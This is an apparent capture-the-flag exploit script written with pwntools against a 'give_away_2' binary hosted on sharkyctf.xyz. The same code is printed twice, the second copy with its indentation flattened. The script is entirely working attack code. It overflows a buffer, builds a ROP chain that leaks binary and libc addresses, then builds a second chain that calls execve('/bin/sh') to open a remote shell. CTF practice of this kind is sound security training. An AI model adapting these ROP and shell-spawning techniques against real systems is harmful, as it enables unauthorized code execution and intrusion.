Creased/exploit.py

## exploit.py
from pwn import *

context.clear(arch='amd64', log_level='info')

LOCAL = False
p = None

def create_process():
    global p
    if LOCAL:
        p = process('./give_away_2')
    else:
        p = remote('sharkyctf.xyz', 20335)

elf = ELF('./give_away_2')

if LOCAL:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    libc = ELF('./libc-2.27.so')

create_process()

# leak the binary base.
leak = p.recvline_contains(b'Give away:')
main = int(leak.split(b': ')[1].strip(), 16)
elf.address = main - elf.sym['main']

# resolve symbols.
pop_rsi_r15 = elf.address + 0x901
pop_rdi = elf.address + 0x903
str_fmt = elf.address + 0x924 + 11 # skip give away and keep %p\n

log.info(f'main: 0x{main:x}')
log.info(f'bin_base: 0x{elf.address:x}')

# Leak the libc based on GOT entry.
payload  = b''
payload += p8(0x41)*(40)

# either create the ROP manually.
# payload += p64(pop_rdi)
# payload += p64(elf.got['__libc_start_main'])
# payload += p64(pop_rsi_r15)  # add value to RDI in order to prevent printf from crashing.
# payload += p64(0)
# payload += p64(0)
# payload += p64(elf.plt['printf'])
# payload += p64(main+0xe)  # skip init_buffering

# OR, using the ROP module.
rop = ROP(elf, badchars='\n')
rop.printf(elf.got['__libc_start_main'], 0)
rop.call(main+0xe)
payload += rop.chain()
p.sendline(payload)

leak_got = p.recv()

leak_got = leak_got.split(b'Give away:')[0]
__libc_start_main = u64(leak_got.ljust(8, b'\0'))
libc.address = __libc_start_main - libc.sym['__libc_start_main']

log.info(f'__libc_start_main: 0x{__libc_start_main:x}')
log.info(f'libc_base: 0x{libc.address:x}')

# Pop a shell.
payload  = b''
payload += p8(0x41)*(40)
rop = ROP(libc, badchars='\n')
rop.call('execve', [next(libc.search(b'/bin/sh')), 0, 0])
payload += rop.chain()
p.sendline(payload)

p.interactive()
p.close()
	from pwn import *

	context.clear(arch='amd64', log_level='info')

	LOCAL = False
	p = None

	def create_process():
	global p
	if LOCAL:
	p = process('./give_away_2')
	else:
	p = remote('sharkyctf.xyz', 20335)

	elf = ELF('./give_away_2')

	if LOCAL:
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	else:
	libc = ELF('./libc-2.27.so')

	create_process()

	# leak the binary base.
	leak = p.recvline_contains(b'Give away:')
	main = int(leak.split(b': ')[1].strip(), 16)
	elf.address = main - elf.sym['main']

	# resolve symbols.
	pop_rsi_r15 = elf.address + 0x901
	pop_rdi = elf.address + 0x903
	str_fmt = elf.address + 0x924 + 11 # skip give away and keep %p\n

	log.info(f'main: 0x{main:x}')
	log.info(f'bin_base: 0x{elf.address:x}')

	# Leak the libc based on GOT entry.
	payload = b''
	payload += p8(0x41)*(40)

	# either create the ROP manually.
	# payload += p64(pop_rdi)
	# payload += p64(elf.got['__libc_start_main'])
	# payload += p64(pop_rsi_r15) # add value to RDI in order to prevent printf from crashing.
	# payload += p64(0)
	# payload += p64(0)
	# payload += p64(elf.plt['printf'])
	# payload += p64(main+0xe) # skip init_buffering

	# OR, using the ROP module.
	rop = ROP(elf, badchars='\n')
	rop.printf(elf.got['__libc_start_main'], 0)
	rop.call(main+0xe)
	payload += rop.chain()
	p.sendline(payload)

	leak_got = p.recv()

	leak_got = leak_got.split(b'Give away:')[0]
	__libc_start_main = u64(leak_got.ljust(8, b'\0'))
	libc.address = __libc_start_main - libc.sym['__libc_start_main']

	log.info(f'__libc_start_main: 0x{__libc_start_main:x}')
	log.info(f'libc_base: 0x{libc.address:x}')

	# Pop a shell.
	payload = b''
	payload += p8(0x41)*(40)
	rop = ROP(libc, badchars='\n')
	rop.call('execve', [next(libc.search(b'/bin/sh')), 0, 0])
	payload += rop.chain()
	p.sendline(payload)

	p.interactive()
	p.close()